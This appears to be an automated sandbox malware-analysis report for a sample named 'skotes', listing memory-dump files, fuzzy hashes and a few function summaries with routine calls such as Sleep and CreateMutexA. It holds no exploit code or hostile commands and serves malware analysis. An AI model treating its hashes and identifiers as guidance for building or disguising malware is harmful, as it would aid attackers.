Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 04a36fcd3c3068b002082084cb093f9089749f9aaae7fc9a55f6fda45d12c3c7
Instruction ID: 9a4f00c8ad3393f51d573175b894d48c2e8a482b576464072caea7cf53630a25
Opcode Fuzzy Hash: 04a36fcd3c3068b002082084cb093f9089749f9aaae7fc9a55f6fda45d12c3c7
Instruction Fuzzy Hash: 25312A31B002059BEB08DB7CDD897AEB776DBCA324F248618E018972D1D7768981CB92

Function 009A9ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009AA963
CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981

Memory Dump Source

Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 639a5f93dba248182210d1b93f35d1ab0a4127b955788a96e5dc0189b89b7515
Instruction ID: 1583b65b083f6ae86aa67574b962f69192073685de9482aec806a372f42fb1fe
Opcode Fuzzy Hash: 639a5f93dba248182210d1b93f35d1ab0a4127b955788a96e5dc0189b89b7515
Instruction Fuzzy Hash: 13216B32704205DBEB18AB6CECC97ADF769EFDA310F204219E408D72D1D7769981CB91

Function 009AA856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009AA963
CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981

Memory Dump Source

Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: f5ae50a5a35547c26b10efc1e0ee04daba67dd9e9e171546d74ec80aa38e1afb
Instruction ID: 9d2e984eae96deed650be0e52d158356b924d1bc054417a63151f0c7f4d4fc09
Opcode Fuzzy Hash: f5ae50a5a35547c26b10efc1e0ee04daba67dd9e9e171546d74ec80aa38e1afb
Instruction Fuzzy Hash: 5F213A313452059BEB2867ADDC8B77EB3659FC7704F244816E108D62D2CB7E8981C6E3

Function 009AA34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009AA963
CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981

Memory Dump Source

Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: c08f9f7c12afb4bff4366499fd170e5eeb809f7056f1ac10c3848a97ea4bb864
Instruction ID: c71b8e1ba35e493016d71b12acc754f71317416b105486f41b7812230a88bfc1
Opcode Fuzzy Hash: c08f9f7c12afb4bff4366499fd170e5eeb809f7056f1ac10c3848a97ea4bb864
Instruction Fuzzy Hash: AD2179327002059BEB18EB6CDC897ADB77ADFDA310F204219E408D76D1DB769980C692

Function 009DD82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,009DA813,00000001,00000364,00000006,000000FF,?,009DEE3F,?,00000004,00000000,?,?), ref: 009DD871

Memory Dump Source

Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2cb0baf9acc66f4dc2a9db96e469d4b686b415a6497e71355595748d87c1526e
Instruction ID: c6ca32679d26490241a13a94cee78583411ff3e0a78486413cd0cf797cff49aa
Opcode Fuzzy Hash: 2cb0baf9acc66f4dc2a9db96e469d4b686b415a6497e71355595748d87c1526e
Instruction Fuzzy Hash: DBF0E9319C322576DB237A729C01B5B775DDF853B0B14C423FC0497381DA20DC01A6E0

Non-executed Functions

Function 009DCBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 009DCC66

Memory Dump Source

Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
